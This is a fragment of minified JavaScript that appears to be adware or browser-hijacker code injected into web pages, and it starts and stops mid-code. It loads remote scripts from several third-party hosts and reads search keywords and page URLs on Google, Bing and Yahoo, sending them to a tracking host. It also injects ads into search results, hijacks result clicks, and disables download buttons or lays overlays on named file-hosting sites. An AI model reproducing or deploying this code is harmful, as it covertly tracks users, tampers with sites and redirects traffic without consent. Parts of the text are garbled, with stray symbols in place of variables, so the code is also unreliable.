a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/fo_bsso.min.js?subid=pnd&hid=9915884634379027054\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=pnd&hid=9915884634379027054';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length); if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a= parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url= function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src= b.pixelHost+\"?hid=9915884634379027054&eid=672&pid=1&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=GB&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\", \"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0, c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener? function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"== a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth= a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault(): a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g= b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}]; for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"== a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search= function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!= __yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a); (function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom= function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&& (\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.inject_search= function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter= 0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e= function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"== a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())}; \"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=9915884634379027054&eid=672&pid=1&prid=338\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\"; e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=511181&ext=dealpeak&systemid=9915884634379027054\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try {new function() {var host = document.location.hostname;if (document.getElementById(\"id_a5473d4cf63ddeac\") == null&& window.self == window.top&& host !== \"www.bing.com\"&& host !== \"bing.com\"&& host !== \"www.tuvaro.com\"&& host !== \"tuvaro.com\"&& host !== \"www.srv1.feedads-srv.com\"&& host !== \"srv1.feedads-srv.com\") {var script = document.createElement(\"script\");script.type = \"text/javascript\";script.src = \"//asrv-a.akamaihd.net/sd/1017/1005.js\";script.setAttribute(\"id\", \"id_a5473d4cf63ddeac\");document.getElementsByTagName(\"head\")[0].appendChild(script);}}}catch (e) {};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=511181&ext=dealpeak&systemid=9915884634379027054\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='GB'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};if(-1<document.location.host.indexOf(\"loud-vibe.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3seal.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3vampire.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0];b.parentNode.style.position=\"relative\";var d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=\"0\";d.style.left=\"0\";d.style.width=\"100%\";d.style.height=\"100%\";d.style.zIndex=\"9999\";d.style.cursor=\"pointer\";b.parentNode.appendChild(d)};;window.top==window.self&&new function(){var a=this;a.hostname=\"sendmusicmyallspy.com\";a.path=\"&eid=672&cc=GB&version=0.1&url=\"+encodeURIComponent(location.href)+\"&lan=\"+navigator.language+\"&ch=1&pid=1&hid=9915884634379027054\";a.prefix=\"rfgvtgbdfgh\";a.now=(new Date).getTime();a.interval=1728E5;a.clickhostname=\"\";a.feeds={mmg:{url:\"\"}};a.utils=new function(){this.addScript=function(b){var c=location.href.match(/http(?:s)?:\\/\\/www\\.bing\\.com\\/search\\?q=.*$/), f=document.createElement(\"script\");f.id=a.prefix;f.type=\"text/javascript\";f.src=b;c&&0<c.length?(b=Element.prototype.appendChild,c=document.createElement(\"iframe\"),Element.prototype.appendChild=c.document.appendChild,document.getElementsByTagName(\"head\")[0].appendChild(f),Element.prototype.appendChild=b):document.getElementsByTagName(\"head\")[0].appendChild(f)};this.decodeHtml=function(b){var c=document.createElement(\"div\");c.innerHTML=b;return c.firstChild.nodeValue};this.query_selector_all=document.querySelectorAll? function(b){try{return document.querySelectorAll(b)}catch©{}}:function(b){var c=b.match(/^#([^,\\s]+)$/)||[];if(1<c.length)return b=document.getElementById(c[1])||void 0,\"undefined\"!=typeof b?:[];c=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild©;document.__asya_qsaels=[];c.styleSheet.cssText=b+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};this.throttle=function(b,c){var a=null;return function(){var e= this,d=arguments;clearTimeout(a);a=setTimeout(function(){b.apply(e,d)},c)}};this.ajax=new function(){var b=this;b.get=function(c,a){try{b.xhr=new XMLHttpRequest,b.xhr.open(\"GET\",c,!0),b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"),b.xhr.onreadystatechange=function(){4==b.xhr.readyState&&a(b.xhr.responseText)},b.xhr.send()}catch(e){}};b.post=function(c,a,e){b.xhr=new XMLHttpRequest;b.xhr.open(\"POST\",c,!0);b.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); b.xhr.onreadystatechange=function(){4==b.ajax.xhr.readyState&&e(b.xhr.responseText)};a=encodeURIComponent(a);b.xhr.send(a)}};this.base64=new function(){var b=this;b._keyStr=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\";b.encode=function©{var a=\"\",e,d,g,h,l,k,m=0;for(c=b._utf8_encode©;m<c.length;)e=c.charCodeAt(m++),d=c.charCodeAt(m++),g=c.charCodeAt(m++),h=e>>2,e=(e&3)<<4|d>>4,l=(d&15)<<2|g>>6,k=g&63,isNaN(d)?l=k=64:isNaN(g)&&(k=64),a=a+b._keyStr.charAt(h)+b._keyStr.charAt(e)+ b._keyStr.charAt(l)+b._keyStr.charAt(k);return a};b.decode=function©{var a=\"\",e,d,g,h,l,k=0;for(c=c.replace(/[^A-Za-z0-9\\+\\/\\=]/g,\"\");k<c.length;)e=b._keyStr.indexOf(c.charAt(k++)),d=b._keyStr.indexOf(c.charAt(k++)),h=b._keyStr.indexOf(c.charAt(k++)),l=b._keyStr.indexOf(c.charAt(k++)),e=e<<2|d>>4,d=(d&15)<<4|h>>2,g=(h&3)<<6|l,a+=String.fromCharCode(e),64!=h&&(a+=String.fromCharCode(d)),64!=l&&(a+=String.fromCharCode(g));return a=b._utf8_decode(a)};b._utf8_encode=function(a){a=a.replace(/\\r\\n/g, \"\\n\");for(var b=\"\",e=0;e<a.length;e++){var d=a.charCodeAt(e);128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b};b._utf8_decode=function(b){for(var 